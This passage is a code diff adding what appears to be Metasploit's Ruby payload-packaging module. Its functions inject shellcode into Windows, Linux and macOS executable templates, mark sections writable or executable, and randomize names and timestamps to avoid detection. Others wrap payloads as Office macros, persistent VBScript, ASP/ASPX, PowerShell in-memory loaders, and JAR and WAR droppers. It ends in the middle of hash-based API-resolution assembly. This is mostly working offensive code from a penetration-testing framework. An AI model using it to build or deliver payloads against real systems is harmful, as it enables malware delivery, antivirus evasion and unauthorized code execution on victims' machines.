+      characteristics = sec[1][0x24,0x4].unpack('L')[0]
+      if pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
+        #put this section writable
+        characteristics|=0x80000000
+        newcharacteristics = [characteristics].pack('L')
+        exe[sec[0],newcharacteristics.length]=newcharacteristics
+      end
+    end
+
+    #put the shellcode at the entry point, overwriting template
+    exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code
+
+    return exe
+  end
+
+  def self.to_win32pe_old(framework, code, opts={})
+
+    payload = code.dup
+    # Allow the user to specify their own EXE template
+    set_template_default(opts, "template_x86_windows_old.exe")
+
+    pe = ''
+    File.open(opts[:template], "rb") { |fd|
+      pe = fd.read(fd.stat.size)
+    }
+
+    if(payload.length <= 2048)
+      payload << Rex::Text.rand_text(2048-payload.length)
+    else
+      raise RuntimeError, "The EXE generator now has a max size of 2048 bytes, please fix the calling module"
+    end
+
+    bo = pe.index('PAYLOAD:')
+    raise RuntimeError, "Invalid Win32 PE OLD EXE template: missing \"PAYLOAD:\" tag" if not bo
+    pe[bo, payload.length] = payload
+
+    pe[136, 4] = [rand(0x100000000)].pack('V')
+
+    ci = pe.index("\x31\xc9" * 160)
+    raise RuntimeError, "Invalid Win32 PE OLD EXE template: missing first \"\\x31\\xc9\"" if not ci
+    cd = pe.index("\x31\xc9" * 160, ci + 320)
+    raise RuntimeError, "Invalid Win32 PE OLD EXE template: missing second \"\\x31\\xc9\"" if not cd
+    rc = pe[ci+320, cd-ci-320]
+
+    # 640 + rc.length bytes of room to store an encoded rc at offset ci
+    enc = encode_stub(framework, [ARCH_X86], rc, ::Msf::Module::PlatformList.win32)
+    lft = 640+rc.length - enc.length
+
+    buf = enc + Rex::Text.rand_text(640+rc.length - enc.length)
+    pe[ci, buf.length] = buf
+
+    # Make the data section executable
+    xi = pe.index([0xc0300040].pack('V'))
+    pe[xi,4] = [0xe0300020].pack('V')
+
+    # Add a couple random bytes for fun
+    pe << Rex::Text.rand_text(rand(64)+4)
+
+    return pe
+  end
+
+  def self.exe_sub_method(code,opts ={})
+
+    pe = ''
+    File.open(opts[:template], "rb") { |fd|
+      pe = fd.read(fd.stat.size)
+    }
+
+    case opts[:exe_type]
+      when :service_exe
+        max_length = 8192
+        name = opts[:servicename]
+
+        if name
+          bo = pe.index('SERVICENAME')
+          raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo
+          pe[bo, 11] = [name].pack('a11')
+        end
+
+        if not opts[:sub_method]
+          pe[136, 4] = [rand(0x100000000)].pack('V')
+        end
+      when :dll
+        max_length = 2048
+      when :exe_sub
+        max_length = 4096
+    end
+
+    bo = pe.index('PAYLOAD:')
+    raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
+
+    if (code.length <= max_length)
+      pe[bo, code.length] = [code].pack("a*")
+    else
+      raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
+    end
+
+    if opts[:exe_type] == :dll
+      mt = pe.index('MUTEX!!!')
+      pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
+    end
+
+    return pe
+  end
+
+  def self.to_win32pe_exe_sub(framework, code, opts={})
+    # Allow the user to specify their own DLL template
+    set_template_default(opts, "template_x86_windows.exe")
+    opts[:exe_type] = :exe_sub
+    exe_sub_method(code,opts)
+  end
+
+  def self.to_win64pe(framework, code, opts={})
+    # Allow the user to specify their own EXE template
+    set_template_default(opts, "template_x64_windows.exe")
+    #try to inject code into executable by adding a section without affecting executable behavior
+    if(opts[:inject])
+      injector = Msf::Exe::SegmentInjector.new({
+         :payload  => code,
+         :template => opts[:template],
+         :arch     => :x64
+      })
+      exe = injector.generate_pe
+      return exe
+    end
+    opts[:exe_type] = :exe_sub
+    exe_sub_method(code,opts)
+  end
+
+  def self.to_win32pe_service(framework, code, opts={})
+    # Allow the user to specify their own service EXE template
+    set_template_default(opts, "template_x86_windows_svc.exe")
+    opts[:exe_type] = :service_exe
+    exe_sub_method(code,opts)
+  end
+
+  def self.to_win64pe_service(framework, code, opts={})
+    # Allow the user to specify their own service EXE template
+    set_template_default(opts, "template_x64_windows_svc.exe")
+    opts[:exe_type] = :service_exe
+    exe_sub_method(code,opts)
+  end
+
+  def self.to_win32pe_dll(framework, code, opts={})
+    # Allow the user to specify their own DLL template
+    set_template_default(opts, "template_x86_windows.dll")
+    opts[:exe_type] = :dll
+    exe_sub_method(code,opts)
+  end
+
+  def self.to_win64pe_dll(framework, code, opts={})
+    # Allow the user to specify their own DLL template
+    set_template_default(opts, "template_x64_windows.dll")
+    opts[:exe_type] = :dll
+    exe_sub_method(code,opts)
+  end
+
+  def self.to_osx_arm_macho(framework, code, opts={})
+
+    # Allow the user to specify their own template
+    set_template_default(opts, "template_armle_darwin.bin")
+
+    mo = ''
+    File.open(opts[:template], "rb") { |fd|
+      mo = fd.read(fd.stat.size)
+    }
+
+    bo = mo.index('PAYLOAD:')
+    raise RuntimeError, "Invalid OSX ArmLE Mach-O template: missing \"PAYLOAD:\" tag" if not bo
+    mo[bo, code.length] = code
+
+    return mo
+  end
+
+  def self.to_osx_ppc_macho(framework, code, opts={})
+
+    # Allow the user to specify their own template
+    set_template_default(opts, "template_ppc_darwin.bin")
+
+    mo = ''
+    File.open(opts[:template], "rb") { |fd|
+      mo = fd.read(fd.stat.size)
+    }
+
+    bo = mo.index('PAYLOAD:')
+    raise RuntimeError, "Invalid OSX PPC Mach-O template: missing \"PAYLOAD:\" tag" if not bo
+    mo[bo, code.length] = code
+
+    return mo
+  end
+
+  def self.to_osx_x86_macho(framework, code, opts={})
+
+    # Allow the user to specify their own template
+    set_template_default(opts, "template_x86_darwin.bin")
+
+    mo = ''
+    File.open(opts[:template], "rb") { |fd|
+      mo = fd.read(fd.stat.size)
+    }
+
+    bo = mo.index('PAYLOAD:')
+    raise RuntimeError, "Invalid OSX x86 Mach-O template: missing \"PAYLOAD:\" tag" if not bo
+    mo[bo, code.length] = code
+
+    return mo
+  end
+
+  def self.to_osx_x64_macho(framework, code, opts={})
+    set_template_default(opts, "template_x64_darwin.bin")
+
+    macho = ''
+
+    File.open(opts[:template], 'rb') { |fd|
+      macho = fd.read(fd.stat.size)
+    }
+
+    bin = macho.index('PAYLOAD:')
+    raise RuntimeError, "Invalid Mac OS X x86_64 Mach-O template: missing \"PAYLOAD:\" tag" if not bin
+    macho[bin, code.length] = code
+
+    return macho
+  end
+
+  # Create an ELF executable containing the payload provided in +code+
+  #
+  # For the default template, this method just appends the payload, checks if
+  # the template is 32 or 64 bit and adjusts the offsets accordingly
+  # For user-provided templates, modifies the header to mark all executable
+  # segments as writable and overwrites the entrypoint (usually _start) with
+  # the payload.
+  #
+  def self.to_exe_elf(framework, opts, template, code, big_endian=false)
+
+    # Allow the user to specify their own template
+    set_template_default(opts, template)
+
+    # The old way to do it is like other formats, just overwrite a big
+    # block of rwx mem with our shellcode.
+    #bo = elf.index( "\x90\x90\x90\x90" * 1024 )
+    #co = elf.index( " " * 512 )
+    #elf[bo, 2048] = [code].pack('a2048') if bo
+
+    # The new template is just an ELF header with its entry point set to
+    # the end of the file, so just append shellcode to it and fixup
+    # p_filesz and p_memsz in the header for a working ELF executable.
+    elf = ''
+    File.open(opts[:template], "rb") { |fd|
+      elf = fd.read(fd.stat.size)
+    }
+
+    elf << code
+
+    # Check EI_CLASS to determine if the header is 32 or 64 bit
+    # Use the proper offsets and pack size
+    case elf[4]
+    when 1, "\x01" # ELFCLASS32 - 32 bit (ruby 1.8 and 1.9)
+      if big_endian
+        elf[0x44,4] = [elf.length].pack('N') #p_filesz
+        elf[0x48,4] = [elf.length + code.length].pack('N') #p_memsz
+      else # little endian
+        elf[0x44,4] = [elf.length].pack('V') #p_filesz
+        elf[0x48,4] = [elf.length + code.length].pack('V') #p_memsz
+      end
+    when 2, "\x02" # ELFCLASS64 - 64 bit (ruby 1.8 and 1.9)
+      if big_endian
+        elf[0x60,8] = [elf.length].pack('Q>') #p_filesz
+        elf[0x68,8] = [elf.length + code.length].pack('Q>') #p_memsz
+      else # little endian
+        elf[0x60,8] = [elf.length].pack('Q') #p_filesz
+        elf[0x68,8] = [elf.length + code.length].pack('Q') #p_memsz
+      end
+    else
+      raise RuntimeError, "Invalid ELF template: EI_CLASS value not supported"
+    end
+
+    return elf
+  end
+
+  # Create a 32-bit Linux ELF containing the payload provided in +code+
+  def self.to_linux_x86_elf(framework, code, opts={})
+    unless opts[:template]
+      default = true
+    end
+
+    if default
+      elf = to_exe_elf(framework, opts, "template_x86_linux.bin", code)
+    else
+      # If this isn't our normal template, we have to do some fancy
+      # header patching to mark the .text section rwx before putting our
+      # payload into the entry point.
+
+      # read in the template and parse it
+      e = Metasm::ELF.decode_file(opts[:template])
+
+      # This will become a modified copy of the template's original phdr
+      new_phdr = Metasm::EncodedData.new
+      e.segments.each { |s|
+        # Be lazy and mark any executable segment as writable.  Doing
+        # it this way means we don't have to care about which one
+        # contains .text
+        if s.flags.include? "X"
+          s.flags += [ "W" ]
+        end
+        new_phdr << s.encode(e)
+      }
+
+      # Copy the original file
+      elf = File.open(opts[:template], "rb") {|fd| fd.read(fd.stat.size) }
+
+      # Replace the header with our rwx modified version
+      elf[e.header.phoff, new_phdr.data.length] = new_phdr.data
+
+      # Replace code at the entrypoint with our payload
+      entry_off = e.addr_to_off(e.label_addr('entrypoint'))
+      elf[entry_off, code.length] = code
+    end
+
+    return elf
+  end
+
+  # Create a 32-bit BSD (test on FreeBSD) ELF containing the payload provided in +code+
+  def self.to_bsd_x86_elf(framework, code, opts={})
+    elf = to_exe_elf(framework, opts, "template_x86_bsd.bin", code)
+    return elf
+  end
+
+  # Create a 32-bit Solaris ELF containing the payload provided in +code+
+  def self.to_solaris_x86_elf(framework, code, opts={})
+    elf = to_exe_elf(framework, opts, "template_x86_solaris.bin", code)
+    return elf
+  end
+
+  # Create a 64-bit Linux ELF containing the payload provided in +code+
+  def self.to_linux_x64_elf(framework, code, opts={})
+    elf = to_exe_elf(framework, opts, "template_x64_linux.bin", code)
+    return elf
+  end
+
+  def self.to_linux_armle_elf(framework, code, opts={})
+    elf = to_exe_elf(framework, opts, "template_armle_linux.bin", code)
+    return elf
+  end
+
+  def self.to_linux_mipsle_elf(framework, code, opts={})
+    elf = to_exe_elf(framework, opts, "template_mipsle_linux.bin", code)
+    return elf
+  end
+
+  def self.to_linux_mipsbe_elf(framework, code, opts={})
+    elf = to_exe_elf(framework, opts, "template_mipsbe_linux.bin", code, true)
+    return elf
+  end
+
+  def self.to_exe_vba(exes='')
+    exe = exes.unpack('C*')
+    hash_sub = {}
+    idx = 0
+    maxbytes = 2000
+    var_base_idx = 0
+    var_base = Rex::Text.rand_text_alpha(5).capitalize
+
+    # First write the macro into the vba file
+    hash_sub[:var_magic] = Rex::Text.rand_text_alpha(10).capitalize
+    hash_sub[:var_fname] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:var_fenvi] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:var_fhand] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:var_parag] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:var_itemp] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:var_btemp] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:var_appnr] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:var_index] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:var_gotmagic] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:var_farg] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:var_stemp] = var_base + (var_base_idx+=1).to_s
+    hash_sub[:filename] = Rex::Text.rand_text_alpha(rand(8)+8)
+
+    # Function 1 extracts the binary
+    hash_sub[:func_name1] = var_base + (var_base_idx+=1).to_s
+
+    # Function 2 executes the binary
+    hash_sub[:func_name2] = var_base + (var_base_idx+=1).to_s
+
+    hash_sub[:data] = ""
+
+    # Writing the bytes of the exe to the file
+    1.upto(exe.length) do |pc|
+      while(c = exe[idx])
+        hash_sub[:data] << "&H#{("%.2x" % c).upcase}"
+        if (idx > 1 and (idx % maxbytes) == 0)
+          # When maxbytes are written make a new paragrpah
+          hash_sub[:data] << "\r\n"
+        end
+        idx += 1
+      end
+    end
+
+    return read_replace_script_template("to_exe.vba.template", hash_sub)
+  end
+
+def self.to_vba(framework,code,opts={})
+    hash_sub = {}
+    hash_sub[:var_myByte]		  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_myArray]		  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_rwxpage]  	  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_res]      	  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_offset] 		  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_lpThreadAttributes] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_dwStackSize]        = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_lpStartAddress]     = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_lpParameter]        = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_dwCreationFlags]	  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_lpThreadID]         = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_lpAddr]             = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_lSize]              = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_flAllocationType]   = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_flProtect]          = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_lDest]	          = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_Source]	 	  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+    hash_sub[:var_Length]		  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
+
+    # put the shellcode bytes into an array
+    hash_sub[:bytes] = Rex::Text.to_vbapplication(code, hash_sub[:var_myArray])
+
+    return read_replace_script_template("to_mem.vba.template", hash_sub)
+  end
+
+  def self.to_exe_vbs(exes = '', opts={})
+    delay   = opts[:delay]   || 5
+    persist = opts[:persist] || false
+
+    hash_sub = {}
+    hash_sub[:var_shellcode] = ""
+    hash_sub[:var_bytes]   = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small
+    hash_sub[:var_fname]   = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_func]    = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_stream]  = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_obj]     = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_shell]   = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
+
+    hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes])
+
+    hash_sub[:init] = ""
+
+    if(persist)
+      hash_sub[:init] << "Do\r\n"
+      hash_sub[:init] << "#{hash_sub[:var_func]}\r\n"
+      hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n"
+      hash_sub[:init] << "Loop\r\n"
+    else
+      hash_sub[:init] << "#{hash_sub[:var_func]}\r\n"
+    end
+
+    return read_replace_script_template("to_exe.vbs.template", hash_sub)
+  end
+
+  def self.to_exe_asp(exes = '', opts={})
+    hash_sub = {}
+    hash_sub[:var_bytes]   = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small
+    hash_sub[:var_fname]   = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_func]    = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_stream]  = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_obj]     = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_shell]   = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
+
+    hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes])
+
+    return read_replace_script_template("to_exe.asp.template", hash_sub)
+  end
+
+  def self.to_exe_aspx(exes = '', opts={})
+    hash_sub = {}
+    hash_sub[:var_file] 	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempdir] 	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_basedir]	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_filename] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempexe] 	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_iterator] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_proc]	= Rex::Text.rand_text_alpha(rand(8)+8)
+
+    hash_sub[:shellcode] = Rex::Text.to_csharp(exes,100,hash_sub[:var_file])
+
+    return read_replace_script_template("to_exe.aspx.template", hash_sub)
+  end
+
+  def self.to_win32pe_psh_net(framework, code, opts={})
+    hash_sub = {}
+    hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_kernel32] 	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_baseaddr] 	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_threadHandle] 	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_output] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_temp] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_codeProvider] 	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_compileParams] 	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+
+    hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
+
+    return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
+  def self.to_win32pe_psh(framework, code, opts={})
+    hash_sub = {}
+    hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_win32_func]	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_payload] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_size] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_rwx] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+
+    hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
+
+    return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
+  def self.to_win32pe_vbs(framework, code, opts={})
+    to_exe_vbs(to_win32pe(framework, code, opts), opts)
+  end
+
+  # Creates a jar file that drops the provided +exe+ into a random file name
+  # in the system's temp dir and executes it.
+  #
+  # @see Msf::Payload::Java
+  #
+  # @return [Rex::Zip::Jar]
+  def self.to_jar(exe, opts={})
+    spawn = opts[:spawn] || 2
+    exe_name = Rex::Text.rand_text_alpha(8) + ".exe"
+    zip = Rex::Zip::Jar.new
+    paths = [
+      [ "metasploit", "Payload.class" ],
+    ]
+    zip.add_files(paths, File.join(Msf::Config.data_directory, "java"))
+    zip.build_manifest :main_class => "metasploit.Payload"
+    config = "Spawn=#{spawn}\r\nExecutable=#{exe_name}\r\n"
+    zip.add_file("metasploit.dat", config)
+    zip.add_file(exe_name, exe)
+
+    zip
+  end
+
+  # Creates a Web Archive (WAR) file from the provided jsp code.
+  #
+  # On Tomcat, WAR files will be deployed into a directory with the same name
+  # as the archive, e.g. +foo.war+ will be extracted into +foo/+. If the
+  # server is in a default configuration, deoployment will happen
+  # automatically. See
+  # {http://tomcat.apache.org/tomcat-5.5-doc/config/host.html the Tomcat
+  # documentation} for a description of how this works.
+  #
+  # @param jsp_raw [String] JSP code to be added in a file called +jsp_name+
+  #   in the archive. This will be compiled by the victim servlet container
+  #   (e.g., Tomcat) and act as the main function for the servlet.
+  # @param opts [Hash]
+  # @option opts :jsp_name [String] Name of the <jsp-file> in the archive
+  #   _without the .jsp extension_. Defaults to random.
+  # @option opts :app_name [String] Name of the app to put in the <servlet-name>
+  #   tag. Mostly irrelevant, except as an identifier in web.xml. Defaults to
+  #   random.
+  # @option opts :extra_files [Array<String,String>] Additional files to add
+  #   to the archive. First elment is filename, second is data
+  #
+  # @todo Refactor to return a {Rex::Zip::Archive} or {Rex::Zip::Jar}
+  #
+  # @return [String]
+  def self.to_war(jsp_raw, opts={})
+    jsp_name = opts[:jsp_name]
+    jsp_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8)
+    app_name = opts[:app_name]
+    app_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8)
+
+    meta_inf = [ 0xcafe, 0x0003 ].pack('Vv')
+    manifest = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n"
+    web_xml = %q{<?xml version="1.0"?>
+<!DOCTYPE web-app PUBLIC
+"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+"http://java.sun.com/dtd/web-app_2_3.dtd">
+<web-app>
+<servlet>
+<servlet-name>NAME</servlet-name>
+<jsp-file>/PAYLOAD.jsp</jsp-file>
+</servlet>
+</web-app>
+}
+    web_xml.gsub!(/NAME/, app_name)
+    web_xml.gsub!(/PAYLOAD/, jsp_name)
+
+    zip = Rex::Zip::Archive.new
+    zip.add_file('META-INF/', '', meta_inf)
+    zip.add_file('META-INF/MANIFEST.MF', manifest)
+    zip.add_file('WEB-INF/', '')
+    zip.add_file('WEB-INF/web.xml', web_xml)
+    # add the payload
+    zip.add_file("#{jsp_name}.jsp", jsp_raw)
+
+    # add extra files
+    if opts[:extra_files]
+      opts[:extra_files].each { |el|
+        zip.add_file(el[0], el[1])
+      }
+    end
+
+    return zip.pack
+  end
+
+  # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
+  # payload.  The jsp page converts the hexdump back to a normal binary file
+  # and places it in the temp directory. The payload file is then executed.
+  #
+  # @see to_war
+  # @param exe [String] Executable to drop and run.
+  # @param opts (see to_war)
+  # @option opts (see to_war)
+  # @return (see to_war)
+  def self.to_jsp_war(exe, opts={})
+
+    # begin <payload>.jsp
+    hash_sub = {}
+    hash_sub[:var_hexpath]       = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_exepath]       = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_data]          = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_inputstream]   = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_outputstream]  = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_numbytes]      = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_bytearray]     = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_bytes]         = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_counter]       = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_char1]         = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_char2]         = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_comb]          = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_exe]           = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_hexfile]       = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_proc]          = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_fperm]         = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_fdel]          = Rex::Text.rand_text_alpha(rand(8)+8)
+
+    # Specify the payload in hex as an extra file..
+    payload_hex = exe.unpack('H*')[0]
+    opts.merge!(
+      {
+        :extra_files =>
+          [
+            [ "#{hash_sub[:var_hexfile]}.txt", payload_hex ]
+          ]
+      })
+
+    template = read_replace_script_template("to_exe_jsp.war.template", hash_sub)
+
+    return self.to_war(template, opts)
+  end
+
+  # Creates a .NET DLL which loads data into memory
+  # at a specified location with read/execute permissions
+  #    - the data will be loaded at: base+0x2065
+  #    - default max size is 0x8000 (32768)
+  def self.to_dotnetmem(base=0x12340000, data="", opts={})
+
+    # Allow the user to specify their own DLL template
+    set_template_default(opts, "dotnetmem.dll")
+
+    pe = ''
+    File.open(opts[:template], "rb") { |fd|
+      pe = fd.read(fd.stat.size)
+    }
+
+    # Configure the image base
+    base_offset = opts[:base_offset] || 180
+    pe[base_offset, 4] = [base].pack('V')
+
+    # Configure the TimeDateStamp
+    timestamp_offset = opts[:timestamp_offset] || 136
+    pe[timestamp_offset, 4] = [rand(0x100000000)].pack('V')
+
+    # XXX: Unfortunately we cant make this RWX only RX
+    # Mark this segment as read-execute AND writable
+    # pe[412,4] = [0xe0000020].pack("V")
+
+    # Write the data into the .text segment
+    text_offset = opts[:text_offset] || 0x1065
+    text_max    = opts[:text_max] || 0x8000
+    pack        = opts[:pack] || 'a32768'
+    pe[text_offset, text_max] = [data].pack(pack)
+
+    # Generic a randomized UUID
+    uuid_offset = opts[:uuid_offset] || 37656
+    pe[uuid_offset,16] = Rex::Text.rand_text(16)
+
+    return pe
+  end
+
+
+  def self.encode_stub(framework, arch, code, platform = nil, badchars='')
+    return code if not framework.encoders
+    framework.encoders.each_module_ranked('Arch' => arch) do |name, mod|
+      begin
+        enc = framework.encoders.create(name)
+        raw = enc.encode(code, badchars, nil, platform)
+        return raw if raw
+      rescue
+      end
+    end
+    nil
+  end
+
+  def self.generate_nops(framework, arch, len, opts={})
+    opts['BadChars'] ||= ''
+    opts['SaveRegisters'] ||= [ 'esp', 'ebp', 'esi', 'edi' ]
+
+    return nil if not framework.nops
+    framework.nops.each_module_ranked('Arch' => arch) do |name, mod|
+      begin
+        nop = framework.nops.create(name)
+        raw = nop.generate_sled(len, opts)
+        return raw if raw
+      rescue
+      end
+    end
+    nil
+  end
+
+  # This wrapper is responsible for allocating RWX memory, copying the
+  # target code there, setting an exception handler that calls ExitProcess
+  # and finally executing the code.
+  def self.win32_rwx_exec(code)
+
+    stub_block = %Q^
+    ; Input: The hash of the API to call and all its parameters must be pushed onto stack.
+    ; Output: The return value from the API call will be in EAX.
+    ; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
+    ; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
+    ; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
+    ; Note: This function is unable to call forwarded exports.
+
+    api_call:
+      pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
+      mov ebp, esp           ; Create a new stack frame
+      xor edx, edx           ; Zero EDX
+      mov edx, [fs:edx+48]   ; Get a pointer to the PEB
+      mov edx, [edx+12]      ; Get PEB->Ldr
+      mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
+    next_mod:                ;
+      mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
+      movzx ecx, word [edx+38] ; Set ECX to the length we want to check
+      xor edi, edi           ; Clear EDI which will store the hash of the module name
+    loop_modname:            ;
+      xor eax, eax           ; Clear EAX
+      lodsb                  ; Read in the next byte of the name
+      cmp al, 'a'            ; Some versions of Windows use lower case module names
+      jl not_lowercase       ;
+      sub al, 0x20           ; If so normalise to uppercase
+    not_lowercase:           ;
+      ror edi, 13            ; Rotate right our hash value
+      add edi, eax           ; Add the next byte of the name
+      ;loop loop_modname      ; Loop until we have read enough
+      ; The random jmps added below will occasionally make this offset
+      ; greater than will fit in a byte, so we have to use a regular jnz
+      ; instruction which can take a full 32-bits to accomodate the
+      ; bigger offset
+      dec ecx
+      jnz loop_modname        ; Loop until we have read enough
+      ; We now have the module hash computed
+      push edx               ; Save the current position in the module list for later
+      push edi               ; Save the current module hash for later
+      ; Proceed to iterate the export address table,
+      mov edx, [edx+16]      ; Get this modules base address
+      mov eax, [edx+60]      ; Get PE header
+      add eax, edx           ; Add the modules base address
+      mov eax, [eax+120]     ; Get export tables RVA
+      test eax, eax          ; Test if no export address table is present
+      jz get_next_mod1       ; If no EAT present, process the next module
+      add eax, edx           ; Add the modules base address
+      push eax               ; Save the current modules EAT
+      mov ecx, [eax+24]      ; Get the number of function names
+      mov ebx, [eax+32]      ; Get the rva of the function names
+      add ebx, edx           ; Add the modules base address
+      ; Computing the module hash + function hash
+    get_next_func:           ;
+      test ecx, ecx          ; Changed from jecxz to accomodate the larger offset produced by random jmps below
+      jz get_next_mod        ; When we reach the start of the EAT (we search backwards), process the next module
+      dec ecx                ; Decrement the function name counter
+      mov esi, [ebx+ecx*4]   ; Get rva of next module name
+      add esi, edx           ; Add the modules base address
+      xor edi, edi           ; Clear EDI which will store the hash of the function name
+      ; And compare it to the one we want
